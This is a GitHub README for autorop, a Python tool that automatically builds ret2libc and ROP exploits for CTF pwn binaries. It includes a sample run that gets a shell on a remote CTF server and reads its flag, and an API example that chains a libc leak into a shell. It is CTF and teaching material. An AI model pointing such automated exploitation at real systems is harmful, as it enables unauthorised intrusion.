Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up

Automated solver of classic CTF pwn challenges, with flexibility in mind.

License

NotificationsYou must be signed in to change notification settings

mariuszskon/autorop

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

docsTest statusMIT license

Automated solver of classic CTF pwn challenges, with flexibility in mind.

Official documentation can be found atautorop.readthedocs.io.

Disclaimer

Do not use this software for illegal purposes. This software is intended to be used in legal Capture the Flag competitions only.

Command line

$ autoropUsage: autorop BINARY [HOST PORT]
$ autorop tests/bamboofox/ret2libc bamboofox.cs.nctu.edu.tw 11002[*] '/home/mariusz/Projects/autorop/tests/bamboofox/ret2libc'    Arch:     i386-32-little    RELRO:    Partial RELRO    Stack:    No canary found    NX:       NX enabled    PIE:      No PIE (0x8048000)[*] Produced pipeline: Classic(Corefile(), OpenTarget(), Puts(False, ['__libc_start_main', 'puts']), Auto(), SystemBinSh())[*] Pipeline [1/5]: Corefile()[+] Starting local process 'tests/bamboofox/ret2libc': pid 18833[*] Process 'tests/bamboofox/ret2libc' stopped with exit code -11 (SIGSEGV) (pid 18833)...[*] Switching to interactive modeHello!The address of "/bin/sh" is 0x804a02cThe address of function "puts" is 0xf7e43da0$ wc -c /home/ctf/flag57 /home/ctf/flag

API

Importing autorop automatically does afrom pwn import *, so you can use all ofpwntools' goodies.

Central to autorop's design is thepipeline. Most functions take in aPwnState, and pass it on to the next function with some attributes changed.Pipeline copies* thePwnState between each function so mutations are safe. This allows great simplicity and flexibility.

See how the below example neatly manages to "downgrade" the problem from something unique, to something generic that theClassic pipeline can handle.

fromautoropimport*BIN="./tests/tjctf_2020/stop"defsend_letter_first(tube,data):# the binary expects us to choose a letter first, before it takes input unsafelytube.sendline("A")# send actual payloadtube.sendline(data)# create a starting states=PwnState(BIN,lambda:process(BIN))# set an overwriter function, if the buffer overflow input# is not available immediatelys.overwriter=send_letter_first# use base classic pipeline, with printf for leakingpipeline=turnkey.Classic(leak=leak.Printf())result=pipeline(s)# switch to interactive shell which we got via the exploitresult.target.interactive()

*Note: Although most of the attributes are deep-copied,target and_elf are not.

Install

  1. Install autorop itself. You might want to be in yourpython virtual environment. After cloning, install with pip:
$ git clone https://github.com/mariuszskon/autorop && cd autorop && pip install .
  1. Make sure corefiles are enabled and are plainly written to the right directory:
# sysctl -w kernel.core_pattern=core.%p
  1. (Optional) Installlibc-database into~/.libc-database (or your own location then editstate.libc_database_path).
  2. All done!

About

Automated solver of classic CTF pwn challenges, with flexibility in mind.

Topics

Resources

License

Stars

Watchers

Forks


[8]ページ先頭

©2009-2025 Movatter.jp